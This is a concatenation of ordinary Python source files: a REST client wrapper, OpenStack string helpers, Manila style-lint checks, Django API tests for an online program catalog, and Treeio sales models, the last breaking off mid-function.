raise Http5xxException(
'HTTP {0}: {1} {2}'.format(resp.status_code, method, url),
response=resp)
return resp
def get(self, auth=None, **kwargs):
args = {
'params': kwargs
}
if auth:
args['auth'] = HTTPBasicAuth(*(auth.split(':')))
resp = self._request('GET', **args)
if 200 <= resp.status_code <= 299:
return resp
raise RestAPIException(
'Unknown response: {0}'.format(resp.status_code),
response=resp)
def post(self, data, auth_token=None, **kwargs):
jsondata = json.dumps(data)
headers = self._get_auth_header(auth_token)
resp = self._request('POST', data=jsondata, params=kwargs,
headers=headers)
if resp.status_code in (201, 301, 302, 303, 307):
location = resp.headers.get('location')
if location:
return self._request('GET', params=kwargs, url=location)
return resp
elif 200 <= resp.status_code <= 299:
return resp
raise RestAPIException(
'Unknown response: {0}'.format(resp.status_code),
response=resp)
def put(self, data, auth_token=None, **kwargs):
jsondata = json.dumps(data)
headers = self._get_auth_header(auth_token)
resp = self._request('PUT', data=jsondata, params=kwargs,
headers=headers)
if resp.status_code in (201, 301, 302, 303, 307):
location = resp.headers['location']
return self._request('GET', params=kwargs, url=location)
elif 200 <= resp.status_code <= 299:
# If the server didn't return the data or a redirect, we
# go fetch it.
if not resp.json:
resp = self._request('GET', params=kwargs)
return resp
raise RestAPIException(
'Unknown response: {0}'.format(resp.status_code),
response=resp)
def delete(self, auth_token=None, **kwargs):
headers = self._get_auth_header(auth_token)
resp = self._request('DELETE', params=kwargs, headers=headers)
if 200 <= resp.status_code <= 299:
return resp
raise RestAPIException(
'Unknown response: {0}'.format(resp.status_code),
response=resp)
class API(object):
"""Convenience wrapper around requests.
Example::
from steve.restapi import API
# Creates an api endpoint
api = API('http://pyvideo.org/v1/api/')
# Does a get for all videos
all_videos = api.video.get()
# Does a get for video with a specific id
video_1 = api.video(1).get()
# Update the data and then put it
video_1['somekey'] = 'newvalue'
api.video(1).put(data=video_1)
# Create a new video. This does a POST and if there's a
# redirect, will pick that up.
newvideo = api.video.post(data={'somekey': 'newvalue'})
"""
def __init__(self, base_url):
self.base_url = base_url
def __getattr__(self, key):
if key in self.__dict__:
return self.__dict__[key]
return Resource(url=urljoin(self.base_url, str(key)))
def get_issues(owner, repo, auth=None):
repo_api = API('https://api.github.com/repos/{user}/{repo}'.format(
user=owner, repo=repo))
return repo_api.issues.get(auth=auth).json()
def get_issue_details(owner, repo, number, auth=None):
repo_api = API('https://api.github.com/repos/{user}/{repo}'.format(
user=owner, repo=repo))
details = repo_api.issues(number).get(auth=auth).json()
if not details['comments']:
details['comments_list'] = []
else:
comments_api = API(
'https://api.github.com/repos/{user}/{repo}/issues/{num}'.format(
user=owner, repo=repo, num=number))
details['comments_list'] = comments_api.comments.get().json()
return details
|
|
# Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
System-level utilities and helper functions.
"""
import re
import sys
import unicodedata
import six
from kwrankingclient.openstack.common.gettextutils import _
# Used for looking up extensions of text
# to their 'multiplied' byte amount
BYTE_MULTIPLIERS = {
'': 1,
't': 1024 ** 4,
'g': 1024 ** 3,
'm': 1024 ** 2,
'k': 1024,
}
BYTE_REGEX = re.compile(r'(^-?\d+)(\D*)')
TRUE_STRINGS = ('1', 't', 'true', 'on', 'y', 'yes')
FALSE_STRINGS = ('0', 'f', 'false', 'off', 'n', 'no')
SLUGIFY_STRIP_RE = re.compile(r"[^\w\s-]")
SLUGIFY_HYPHENATE_RE = re.compile(r"[-\s]+")
def int_from_bool_as_string(subject):
"""Interpret a string as a boolean and return either 1 or 0.
Any string value in:
('True', 'true', 'On', 'on', '1')
is interpreted as a boolean True.
Useful for JSON-decoded stuff and config file parsing
"""
return bool_from_string(subject) and 1 or 0
def bool_from_string(subject, strict=False):
"""Interpret a string as a boolean.
A case-insensitive match is performed such that strings matching 't',
'true', 'on', 'y', 'yes', or '1' are considered True and, when
`strict=False`, anything else is considered False.
Useful for JSON-decoded stuff and config file parsing.
If `strict=True`, unrecognized values, including None, will raise a
ValueError which is useful when parsing values passed in from an API call.
Strings yielding False are 'f', 'false', 'off', 'n', 'no', or '0'.
"""
if not isinstance(subject, six.string_types):
subject = str(subject)
lowered = subject.strip().lower()
if lowered in TRUE_STRINGS:
return True
elif lowered in FALSE_STRINGS:
return False
elif strict:
acceptable = ', '.join(
"'%s'" % s for s in sorted(TRUE_STRINGS + FALSE_STRINGS))
msg = _("Unrecognized value '%(val)s', acceptable values are:"
" %(acceptable)s") % {'val': subject,
'acceptable': acceptable}
raise ValueError(msg)
else:
return False
def safe_decode(text, incoming=None, errors='strict'):
"""Decodes incoming str using `incoming` if they're not already unicode.
:param incoming: Text's current encoding
:param errors: Errors handling policy. See here for valid
values http://docs.python.org/2/library/codecs.html
:returns: text or a unicode `incoming` encoded
representation of it.
:raises TypeError: If text is not an instance of str
"""
if not isinstance(text, six.string_types):
raise TypeError("%s can't be decoded" % type(text))
if isinstance(text, six.text_type):
return text
if not incoming:
incoming = (sys.stdin.encoding or
sys.getdefaultencoding())
try:
return text.decode(incoming, errors)
except UnicodeDecodeError:
# Note(flaper87) If we get here, it means that
# sys.stdin.encoding / sys.getdefaultencoding
# didn't return a suitable encoding to decode
# text. This happens mostly when global LANG
# var is not set correctly and there's no
# default encoding. In this case, most likely
# python will use ASCII or ANSI encoders as
# default encodings but they won't be capable
# of decoding non-ASCII characters.
#
# Also, UTF-8 is being used since it's an ASCII
# extension.
return text.decode('utf-8', errors)
def safe_encode(text, incoming=None,
encoding='utf-8', errors='strict'):
"""Encodes incoming str/unicode using `encoding`.
If incoming is not specified, text is expected to be encoded with
current python's default encoding. (`sys.getdefaultencoding`)
:param incoming: Text's current encoding
:param encoding: Expected encoding for text (Default UTF-8)
:param errors: Errors handling policy. See here for valid
values http://docs.python.org/2/library/codecs.html
:returns: text or a bytestring `encoding` encoded
representation of it.
:raises TypeError: If text is not an instance of str
"""
if not isinstance(text, six.string_types):
raise TypeError("%s can't be encoded" % type(text))
if not incoming:
incoming = (sys.stdin.encoding or
sys.getdefaultencoding())
if isinstance(text, six.text_type):
if six.PY3:
return text.encode(encoding, errors).decode(incoming)
else:
return text.encode(encoding, errors)
elif text and encoding != incoming:
# Decode text before encoding it with `encoding`
text = safe_decode(text, incoming, errors)
if six.PY3:
return text.encode(encoding, errors).decode(incoming)
else:
return text.encode(encoding, errors)
return text
def to_bytes(text, default=0):
"""Converts a string into an integer of bytes.
Looks at the last characters of the text to determine
what conversion is needed to turn the input text into a byte number.
Supports "B, K(B), M(B), G(B), and T(B)". (case insensitive)
:param text: String input for bytes size conversion.
:param default: Default return value when text is blank.
"""
match = BYTE_REGEX.search(text)
if match:
magnitude = int(match.group(1))
mult_key_org = match.group(2)
if not mult_key_org:
return magnitude
elif text:
msg = _('Invalid string format: %s') % text
raise TypeError(msg)
else:
return default
mult_key = mult_key_org.lower().replace('b', '', 1)
multiplier = BYTE_MULTIPLIERS.get(mult_key)
if multiplier is None:
msg = _('Unknown byte multiplier: %s') % mult_key_org
raise TypeError(msg)
return magnitude * multiplier
def to_slug(value, incoming=None, errors="strict"):
"""Normalize string.
Convert to lowercase, remove non-word characters, and convert spaces
to hyphens.
Inspired by Django's `slugify` filter.
:param value: Text to slugify
:param incoming: Text's current encoding
:param errors: Errors handling policy. See here for valid
values http://docs.python.org/2/library/codecs.html
:returns: slugified unicode representation of `value`
:raises TypeError: If text is not an instance of str
"""
value = safe_decode(value, incoming, errors)
# NOTE(aababilov): no need to use safe_(encode|decode) here:
# encodings are always "ascii", error handling is always "ignore"
# and types are always known (first: unicode; second: str)
value = unicodedata.normalize("NFKD", value).encode(
"ascii", "ignore").decode("ascii")
value = SLUGIFY_STRIP_RE.sub("", value).strip().lower()
return SLUGIFY_HYPHENATE_RE.sub("-", value)
|
|
# Copyright (c) 2012, Cloudscaling
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import re
import pep8
"""
Guidelines for writing new hacking checks
- Use only for Manila specific tests. OpenStack general tests
should be submitted to the common 'hacking' module.
- Pick numbers in the range M3xx. Find the current test with
the highest allocated number and then pick the next value.
- Keep the test method code in the source file ordered based
on the M3xx value.
- List the new rule in the top level HACKING.rst file
- Add test cases for each new rule to manila/tests/test_hacking.py
"""
UNDERSCORE_IMPORT_FILES = []
log_translation = re.compile(
r"(.)*LOG\.(audit|error|info|critical|exception)\(\s*('|\")")
log_translation_LC = re.compile(
r"(.)*LOG\.(critical)\(\s*(_\(|'|\")")
log_translation_LE = re.compile(
r"(.)*LOG\.(error|exception)\(\s*(_\(|'|\")")
log_translation_LI = re.compile(
r"(.)*LOG\.(info)\(\s*(_\(|'|\")")
log_translation_LW = re.compile(
r"(.)*LOG\.(warning|warn)\(\s*(_\(|'|\")")
translated_log = re.compile(
r"(.)*LOG\.(audit|error|info|warn|warning|critical|exception)"
"\(\s*_\(\s*('|\")")
string_translation = re.compile(r"[^_]*_\(\s*('|\")")
underscore_import_check = re.compile(r"(.)*import _(.)*")
# We need this for cases where they have created their own _ function.
custom_underscore_check = re.compile(r"(.)*_\s*=\s*(.)*")
oslo_namespace_imports = re.compile(r"from[\s]*oslo[.](.*)")
dict_constructor_with_list_copy_re = re.compile(r".*\bdict\((\[)?(\(|\[)")
class BaseASTChecker(ast.NodeVisitor):
"""Provides a simple framework for writing AST-based checks.
Subclasses should implement visit_* methods like any other AST visitor
implementation. When they detect an error for a particular node the
method should call ``self.add_error(offending_node)``. Details about
where in the code the error occurred will be pulled from the node
object.
Subclasses should also provide a class variable named CHECK_DESC to
be used for the human readable error message.
"""
CHECK_DESC = 'No check message specified'
def __init__(self, tree, filename):
"""This object is created automatically by pep8.
:param tree: an AST tree
:param filename: name of the file being analyzed
(ignored by our checks)
"""
self._tree = tree
self._errors = []
def run(self):
"""Called automatically by pep8."""
self.visit(self._tree)
return self._errors
def add_error(self, node, message=None):
"""Add an error caused by a node to the list of errors for pep8."""
message = message or self.CHECK_DESC
error = (node.lineno, node.col_offset, message, self.__class__)
self._errors.append(error)
def _check_call_names(self, call_node, names):
if isinstance(call_node, ast.Call):
if isinstance(call_node.func, ast.Name):
if call_node.func.id in names:
return True
return False
def no_translate_debug_logs(logical_line, filename):
"""Check for 'LOG.debug(_('
As per our translation policy,
https://wiki.openstack.org/wiki/LoggingStandards#Log_Translation
we shouldn't translate debug level logs.
* This check assumes that 'LOG' is a logger.
* Use filename so we can start enforcing this in specific folders instead
of needing to do so all at once.
M319
"""
if logical_line.startswith("LOG.debug(_("):
yield(0, "M319 Don't translate debug level logs")
def validate_log_translations(logical_line, physical_line, filename):
# Translations are not required in the test and tempest
# directories.
if ("manila/tests" in filename or "manila_tempest_tests" in filename or
"contrib/tempest" in filename):
return
if pep8.noqa(physical_line):
return
msg = "M327: LOG.critical messages require translations `_LC()`!"
if log_translation_LC.match(logical_line):
yield (0, msg)
msg = ("M328: LOG.error and LOG.exception messages require translations "
"`_LE()`!")
if log_translation_LE.match(logical_line):
yield (0, msg)
msg = "M329: LOG.info messages require translations `_LI()`!"
if log_translation_LI.match(logical_line):
yield (0, msg)
msg = "M330: LOG.warning messages require translations `_LW()`!"
if log_translation_LW.match(logical_line):
yield (0, msg)
msg = "M331: Log messages require translations!"
if log_translation.match(logical_line):
yield (0, msg)
def check_explicit_underscore_import(logical_line, filename):
"""Check for explicit import of the _ function
We need to ensure that any files that are using the _() function
to translate logs are explicitly importing the _ function. We
can't trust unit test to catch whether the import has been
added so we need to check for it here.
"""
# Build a list of the files that have _ imported. No further
# checking needed once it is found.
if filename in UNDERSCORE_IMPORT_FILES:
pass
elif (underscore_import_check.match(logical_line) or
custom_underscore_check.match(logical_line)):
UNDERSCORE_IMPORT_FILES.append(filename)
elif (translated_log.match(logical_line) or
string_translation.match(logical_line)):
yield(0, "M323: Found use of _() without explicit import of _ !")
class CheckForStrExc(BaseASTChecker):
"""Checks for the use of str() on an exception.
This currently only handles the case where str() is used in
the scope of an exception handler. If the exception is passed
into a function, returned from an assertRaises, or used on an
exception created in the same scope, this does not catch it.
"""
CHECK_DESC = ('M325 str() cannot be used on an exception. '
'Remove or use six.text_type()')
def __init__(self, tree, filename):
super(CheckForStrExc, self).__init__(tree, filename)
self.name = []
self.already_checked = []
def visit_TryExcept(self, node):
for handler in node.handlers:
if handler.name:
self.name.append(handler.name.id)
super(CheckForStrExc, self).generic_visit(node)
self.name = self.name[:-1]
else:
super(CheckForStrExc, self).generic_visit(node)
def visit_Call(self, node):
if self._check_call_names(node, ['str']):
if node not in self.already_checked:
self.already_checked.append(node)
if isinstance(node.args[0], ast.Name):
if node.args[0].id in self.name:
self.add_error(node.args[0])
super(CheckForStrExc, self).generic_visit(node)
class CheckForTransAdd(BaseASTChecker):
"""Checks for the use of concatenation on a translated string.
Translations should not be concatenated with other strings, but
should instead include the string being added to the translated
string to give the translators the most information.
"""
CHECK_DESC = ('M326 Translated messages cannot be concatenated. '
'String should be included in translated message.')
TRANS_FUNC = ['_', '_LI', '_LW', '_LE', '_LC']
def visit_BinOp(self, node):
if isinstance(node.op, ast.Add):
if self._check_call_names(node.left, self.TRANS_FUNC):
self.add_error(node.left)
elif self._check_call_names(node.right, self.TRANS_FUNC):
self.add_error(node.right)
super(CheckForTransAdd, self).generic_visit(node)
def check_oslo_namespace_imports(logical_line, physical_line, filename):
if pep8.noqa(physical_line):
return
if re.match(oslo_namespace_imports, logical_line):
msg = ("M333: '%s' must be used instead of '%s'.") % (
logical_line.replace('oslo.', 'oslo_'),
logical_line)
yield(0, msg)
def dict_constructor_with_list_copy(logical_line):
msg = ("M336: Must use a dict comprehension instead of a dict constructor"
" with a sequence of key-value pairs."
)
if dict_constructor_with_list_copy_re.match(logical_line):
yield (0, msg)
def factory(register):
register(validate_log_translations)
register(check_explicit_underscore_import)
register(no_translate_debug_logs)
register(CheckForStrExc)
register(CheckForTransAdd)
register(check_oslo_namespace_imports)
register(dict_constructor_with_list_copy)
|
|
"""Tests for the API"""
from unittest.mock import Mock
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from courses.catalog_serializers import CatalogProgramSerializer
from courses.factories import ProgramFactory, CourseFactory, CourseRunFactory
from courses.serializers import ProgramSerializer, CourseRunSerializer
from dashboard.factories import ProgramEnrollmentFactory
from dashboard.models import ProgramEnrollment
from micromasters.factories import UserFactory
from micromasters.test_utils import assert_drf_json_equal
from profiles.models import Profile
from search.base import MockedESTestCase
class ProgramTests(MockedESTestCase):
"""Tests for the Program API"""
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.user = UserFactory.create()
def setUp(self):
super().setUp()
self.client.force_login(self.user)
def test_lists_live_programs(self):
"""Live programs should show up"""
prog = ProgramFactory.create(live=True)
resp = self.client.get(reverse('program-list'))
assert len(resp.json()) == 1
context = {"request": Mock(user=self.user)}
data = ProgramSerializer(prog, context=context).data
assert [data] == resp.json()
def test_doesnt_list_unlive_programs(self):
"""Not-live programs should NOT show up"""
ProgramFactory.create(live=False)
resp = self.client.get(reverse('program-list'))
assert len(resp.json()) == 0
def create_learner_with_image(privacy):
"""Helper function to create a user with account_privacy and image_small set"""
user = UserFactory.create()
user.profile.account_privacy = privacy
user.profile.image_small = 'some_url'
user.profile.save()
return user
class ProgramLearnersTests(MockedESTestCase, APITestCase):
"""Tests for the ProgramLearners API"""
@classmethod
def setUpTestData(cls):
super(ProgramLearnersTests, cls).setUpTestData()
cls.program = ProgramFactory.create(live=True)
cls.url = reverse('learners_in_program', kwargs={"program_id": cls.program.id})
cls.user = create_learner_with_image(privacy=Profile.PUBLIC)
def setUp(self):
self.client.force_login(self.user)
def create_learners_in_program(self, learners_count, privacy=Profile.PUBLIC):
"""helper function to create a list of learners in the program"""
for _ in range(0, learners_count):
user = create_learner_with_image(privacy)
ProgramEnrollmentFactory.create(
user=user,
program=self.program,
)
def test_should_get_empty_list_if_only_one_learner(self):
"""
should return empty list for learners if there are no other enrolled learners
"""
response = self.client.get(self.url)
assert response.status_code == status.HTTP_200_OK
assert response.data['learners_count'] == 0
def test_should_return_only_eight_users(self):
"""
should return total number of learners in the program
and only eight of them in a list
"""
self.create_learners_in_program(learners_count=10)
response = self.client.get(self.url)
assert response.status_code == status.HTTP_200_OK
assert response.data['learners_count'] == 10
assert len(response.data['learners']) == 8
def test_should_return_only_public_users(self):
"""
should return only profiles that are not private
"""
self.create_learners_in_program(learners_count=5, privacy=Profile.PRIVATE)
self.create_learners_in_program(learners_count=5, privacy=Profile.PUBLIC_TO_MM)
self.create_learners_in_program(learners_count=5)
response = self.client.get(self.url)
assert response.status_code == status.HTTP_200_OK
assert response.data['learners_count'] == 10
class ProgramEnrollmentTests(MockedESTestCase, APITestCase):
"""Tests for the ProgramEnrollment API"""
@classmethod
def setUpTestData(cls):
super(ProgramEnrollmentTests, cls).setUpTestData()
cls.user1 = UserFactory.create()
cls.user2 = UserFactory.create()
cls.program1 = ProgramFactory.create(live=True)
cls.program2 = ProgramFactory.create(live=True)
cls.program3 = ProgramFactory.create(live=True)
cls.url = reverse('user_program_enrollments')
def setUp(self):
super().setUp()
self.default_enrollments = [
ProgramEnrollmentFactory(
user=self.user1,
program=program,
) for program in (self.program1, self.program2,)
]
self.client.force_login(self.user1)
def tearDown(self):
super().tearDown()
ProgramEnrollment.objects.all().delete()
def assert_program_enrollments_count(self, expected_count=None):
"""Helper function to count the number of program enrollments"""
if expected_count is None:
expected_count = len(self.default_enrollments)
count = ProgramEnrollment.objects.count()
assert count == expected_count
return count
def test_anonymous(self):
"""Anonymous user cannot access the endpoint"""
self.client.logout()
resp = self.client.post(self.url)
assert resp.status_code == status.HTTP_403_FORBIDDEN
def test_no_enrollments(self):
"""Requests for a user with no program enrollments result in an empty list"""
self.client.logout()
self.client.force_login(self.user2)
resp = self.client.get(self.url)
assert resp.status_code == status.HTTP_405_METHOD_NOT_ALLOWED
def test_no_get_for_enrollments(self):
"""GET is not allowed for /api/v0/enrolledprograms/"""
resp = self.client.get(self.url)
assert resp.status_code == status.HTTP_405_METHOD_NOT_ALLOWED
def test_create_no_program_id(self):
"""Missing mandatory program_id parameter"""
self.assert_program_enrollments_count()
resp = self.client.post(self.url, {}, format='json')
self.assert_program_enrollments_count()
assert resp.status_code == status.HTTP_400_BAD_REQUEST
def test_create_invalid_program_id(self):
"""program_id parameter must be an integer"""
self.assert_program_enrollments_count()
resp = self.client.post(self.url, {'program_id': 'foo'}, format='json')
self.assert_program_enrollments_count()
assert resp.status_code == status.HTTP_400_BAD_REQUEST
def test_create_enrollment_exists(self):
"""Test in case the enrollment is already there"""
self.assert_program_enrollments_count()
resp = self.client.post(self.url, {'program_id': self.program1.pk}, format='json')
self.assert_program_enrollments_count()
assert resp.status_code == status.HTTP_200_OK
self.assert_program_enrollments_count()
def test_create_program_does_not_exists(self):
"""Test in case the program does not exist"""
self.assert_program_enrollments_count()
resp = self.client.post(self.url, {'program_id': 1234567}, format='json')
self.assert_program_enrollments_count()
assert resp.status_code == status.HTTP_404_NOT_FOUND
def test_create_program_not_live(self):
"""Test in case the program is not live"""
program = ProgramFactory.create(live=False)
self.assert_program_enrollments_count()
resp = self.client.post(self.url, {'program_id': program.pk}, format='json')
self.assert_program_enrollments_count()
assert resp.status_code == status.HTTP_404_NOT_FOUND
def test_create(self):
"""Test for happy path"""
count_before = self.assert_program_enrollments_count()
resp = self.client.post(self.url, {'program_id': self.program3.pk}, format='json')
self.assert_program_enrollments_count(count_before+1)
assert resp.status_code == status.HTTP_201_CREATED
assert resp.data.get('id') == self.program3.pk
class CourseRunTests(MockedESTestCase, APITestCase):
"""Tests for CourseRun API"""
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.user = UserFactory.create()
def setUp(self):
super().setUp()
self.client.force_login(self.user)
def test_lists_course_runs(self):
"""Course Runs should show up"""
course_run = CourseRunFactory.create()
resp = self.client.get(reverse('courserun-list'))
assert len(resp.json()) == 1
context = {"request": Mock(user=self.user)}
data = CourseRunSerializer(course_run, context=context).data
assert [data] == resp.json()
class CatalogTests(MockedESTestCase, APITestCase):
"""Tests for catalog API"""
def test_lists_catalog(self):
"""Course Runs should show up"""
program = ProgramFactory.create(live=True)
for course in CourseFactory.create_batch(3, program=program):
CourseRunFactory.create_batch(2, course=course)
resp = self.client.get(reverse('catalog-list'))
assert len(resp.json()) == 1
data = CatalogProgramSerializer(program).data
assert_drf_json_equal([data], resp.json())
|
|
# encoding: utf-8
# Copyright 2011 Tree.io Limited
# This file is part of Treeio.
# License www.tree.io/license
"""
Sales module objects.
"""
from django.core.urlresolvers import reverse
from django.db import models
from treeio.core.models import Object, User, ModuleSetting
from treeio.identities.models import Contact
from treeio.finance.models import Transaction, Currency, Tax
from datetime import datetime, timedelta, time
from dateutil.relativedelta import relativedelta
from decimal import Decimal, ROUND_UP
from time import time as ttime
class SaleStatus(Object):
"Status of the Sale"
name = models.CharField(max_length=512)
use_leads = models.BooleanField(default=False)
use_opportunities = models.BooleanField(default=False)
use_sales = models.BooleanField(default=False)
active = models.BooleanField(default=False)
hidden = models.BooleanField(default=False)
details = models.TextField(blank=True, null=True)
searchable = False
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_status_view', args=[self.id])
except Exception:
return ""
class Meta:
"SalesStatus"
ordering = ('hidden', '-active', 'name')
class Product(Object):
"Single Product"
PRODUCT_TYPES = (
('service', 'Service'),
('good', 'Good'),
('subscription', 'Subscription'),
('compound', 'Compound'),
)
ACTION_CHOICES = (
('inactive', 'Mark Inactive'),
('notify', 'Notify'),
('ignore', 'Ignore'),
)
name = models.CharField(max_length=512)
product_type = models.CharField(max_length=32, default='good',
choices=PRODUCT_TYPES)
parent = models.ForeignKey('self', blank=True, null=True,
related_name='child_set')
code = models.CharField(max_length=512, blank=True, null=True)
supplier = models.ForeignKey(Contact, blank=True, null=True,
on_delete=models.SET_NULL)
supplier_code = models.IntegerField(blank=True, null=True)
buy_price = models.DecimalField(max_digits=20, decimal_places=2, default=0)
sell_price = models.DecimalField(
max_digits=20, decimal_places=2, default=0)
stock_quantity = models.IntegerField(blank=True, null=True)
active = models.BooleanField(default=False)
runout_action = models.CharField(max_length=32, blank=True, null=True,
choices=ACTION_CHOICES)
details = models.TextField(blank=True, null=True)
access_inherit = ('parent', '*module', '*user')
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_product_view', args=[self.id])
except:
return ""
class Meta:
"Product"
ordering = ['code']
class SaleSource(Object):
"Source of Sale e.g. Search Engine"
name = models.CharField(max_length=512)
active = models.BooleanField(default=False)
details = models.TextField(blank=True, null=True)
searchable = False
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_source_view', args=[self.id])
except Exception:
return ""
class Meta:
ordering = ('-active', 'name')
class Lead(Object):
"Lead"
CONTACT_METHODS = (
('email', 'E-Mail'),
('phone', 'Phone'),
('post', 'Post'),
('face', 'Face to Face')
)
contact = models.ForeignKey(Contact)
source = models.ForeignKey(
SaleSource, blank=True, null=True, on_delete=models.SET_NULL)
products_interested = models.ManyToManyField(
Product, blank=True, null=True)
contact_method = models.CharField(max_length=32, choices=CONTACT_METHODS)
assigned = models.ManyToManyField(User, related_name='sales_lead_assigned',
blank=True, null=True)
status = models.ForeignKey(SaleStatus)
details = models.TextField(blank=True, null=True)
access_inherit = ('contact', '*module', '*user')
def __unicode__(self):
return unicode(self.contact.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_lead_view', args=[self.id])
except Exception:
return ""
class Meta:
"Lead"
ordering = ['contact']
class Opportunity(Object):
"Opportunity"
lead = models.ForeignKey(
Lead, blank=True, null=True, on_delete=models.SET_NULL)
contact = models.ForeignKey(Contact)
products_interested = models.ManyToManyField(Product)
source = models.ForeignKey(
SaleSource, blank=True, null=True, on_delete=models.SET_NULL)
expected_date = models.DateField(blank=True, null=True)
closed_date = models.DateField(blank=True, null=True)
assigned = models.ManyToManyField(
User, related_name='sales_opportunity_assigned', blank=True, null=True)
status = models.ForeignKey(SaleStatus)
probability = models.DecimalField(
max_digits=3, decimal_places=0, blank=True, null=True)
amount = models.DecimalField(max_digits=20, decimal_places=2, default=0)
amount_currency = models.ForeignKey(Currency)
amount_display = models.DecimalField(
max_digits=20, decimal_places=2, default=0)
details = models.TextField(blank=True, null=True)
access_inherit = ('lead', 'contact', '*module', '*user')
def __unicode__(self):
return unicode(self.contact)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_opportunity_view', args=[self.id])
except Exception:
return ""
class Meta:
"Opportunity"
ordering = ['-expected_date']
class SaleOrder(Object):
"Sale Order"
reference = models.CharField(max_length=512, blank=True, null=True)
datetime = models.DateTimeField(default=datetime.now)
client = models.ForeignKey(
Contact, blank=True, null=True, on_delete=models.SET_NULL)
opportunity = models.ForeignKey(
Opportunity, blank=True, null=True, on_delete=models.SET_NULL)
payment = models.ManyToManyField(Transaction, blank=True, null=True)
source = models.ForeignKey(SaleSource)
assigned = models.ManyToManyField(
User, related_name='sales_saleorder_assigned', blank=True, null=True)
status = models.ForeignKey(SaleStatus)
currency = models.ForeignKey(Currency)
total = models.DecimalField(max_digits=20, decimal_places=2, default=0)
total_display = models.DecimalField(
max_digits=20, decimal_places=2, default=0)
details = models.TextField(blank=True, null=True)
access_inherit = ('opportunity', 'client', '*module', '*user')
def fulfil(self):
"Fulfil"
for p in self.orderedproduct_set.all():
if not p.fulfilled:
product = p.product
product.stock_quantity -= p.quantity
product.save()
p.fulfilled = True
p.save()
if p.subscription:
p.subscription.renew()
def get_next_reference(self):
try:
# Very dirty hack, but kinda works for reference (i.e. it doesn't
# have to be unique)
next_ref = SaleOrder.objects.all().aggregate(
models.Max('id'))['id__max'] + 1
except:
next_ref = 1
full_ref = '%.5d/%s' % (next_ref, str(str(ttime() * 10)[8:-2]))
return full_ref
def save(self, *args, **kwargs):
"Automatically set order reference"
super(SaleOrder, self).save(*args, **kwargs)
try:
conf = ModuleSetting.get_for_module(
'treeio.sales', 'order_fulfil_status')[0]
fulfil_status = long(conf.value)
if self.status.id == fulfil_status:
self.fulfil()
except Exception:
pass
def __unicode__(self):
return unicode(self.reference)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_order_view', args=[self.id])
except Exception:
return ""
def get_taxes(self, base=False):
# TODO: Compound taxes
taxes = {}
ops = self.orderedproduct_set.filter(
trash=False).filter(tax__isnull=False)
for p in ops:
if base:
item_total = p.get_total()
else:
item_total = p.get_total_display()
if p.tax.id in taxes:
taxes[p.tax.id]['amount'] += (item_total * (p.tax.rate / 100)).quantize(Decimal('.01'),
rounding=ROUND_UP)
else:
taxes[p.tax.id] = {'name': p.tax.name, 'rate': p.tax.rate,
'amount': (item_total * (p.tax.rate / 100))
.quantize(Decimal('.01'), rounding=ROUND_UP)}
return taxes
def get_taxes_total(self):
taxes = self.get_taxes()
total = 0
for tax in taxes.values():
total += tax['amount']
return total
def get_subtotal(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total()
self.total = sum
return sum
def get_subtotal_display(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total_display()
self.total_display = sum
return sum
def get_total(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total()
sum += self.get_taxes_total()
self.total = sum
return sum
def get_total_display(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total_display()
sum += self.get_taxes_total()
self.total_display = sum
return sum
def update_total(self):
self.get_total()
self.get_total_display()
self.save()
def get_total_paid(self):
return Decimal(
self.payment.filter(trash=False).aggregate(models.Sum('value_display'))['value_display__sum'] or '0')
def balance_due(self):
return self.get_total() - self.get_total_paid()
class Meta:
"SaleOrder"
ordering = ['-datetime']
class Subscription(Object):
"Subscription"
CYCLE_PERIODS = (
('daily', 'Daily'),
('weekly', 'Weekly'),
('monthly', 'Monthly'),
('quarterly', 'Quarterly'),
('yearly', 'Yearly')
)
client = models.ForeignKey(
Contact, blank=True, null=True, on_delete=models.SET_NULL)
product = models.ForeignKey(Product, blank=True, null=True)
start = models.DateField(default=datetime.now)
expiry = models.DateField(blank=True, null=True)
cycle_period = models.CharField(max_length=32, choices=CYCLE_PERIODS, default='month')
cycle_end = models.DateField(blank=True, null=True)
active = models.BooleanField(default=False)
details = models.CharField(max_length=512, blank=True, null=True)
access_inherit = ('client', 'product', '*module', '*user')
def get_cycle_start(self):
"Get the cycle start date"
if not self.cycle_end:
return None
cycle_end = self.cycle_end
# check if we're in the 5 day window before the cycle ends for this
# subscription
if self.cycle_period == 'monthly':
p = relativedelta(months=+1)
elif self.cycle_period == 'weekly':
p = timedelta(weeks=1)
elif self.cycle_period == 'daily':
p = timedelta(days=1)
elif self.cycle_period == 'quarterly':
p = relativedelta(months=+4)
elif self.cycle_period == 'yearly':
p = relativedelta(years=1)
else:
p = relativedelta(months=+1)
cycle_start = cycle_end - p
return cycle_start
def renew(self):
"Renew"
if self.cycle_period == 'monthly':
